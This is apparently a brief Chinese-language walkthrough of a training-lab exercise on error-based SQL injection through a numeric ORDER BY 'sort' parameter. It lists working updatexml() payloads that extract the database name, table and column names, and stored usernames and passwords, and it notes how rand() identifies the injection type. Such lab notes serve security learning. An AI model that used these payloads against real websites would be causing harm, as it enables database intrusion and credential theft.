order by注入,错误回显,数字型注入
判断库名:
?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)
判断表名:
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
判断字段名:
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)
查询数据:
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)
1.提示: Please input parameter as SORT with numeric value
用数字形式输入sort排序参数
2.尝试加上“ ' ” 观察是否会有报错注入,数字型order by注入时,语句order by=2 and 1=2,和order by=2 and 1=1得到的结果一致,所以不能用来判断注入点类型,而用rand()会显示不同的排序结果,在字符型中用?sort=rand(),没有效果,排序没有变化,因此使用rand()判断注入点类型。
3.第四个回显时报错,说明只有三个字段, sort=1,2,3时 表格以第一列,第二列,第三列排列
4.库名
表名
数据
数据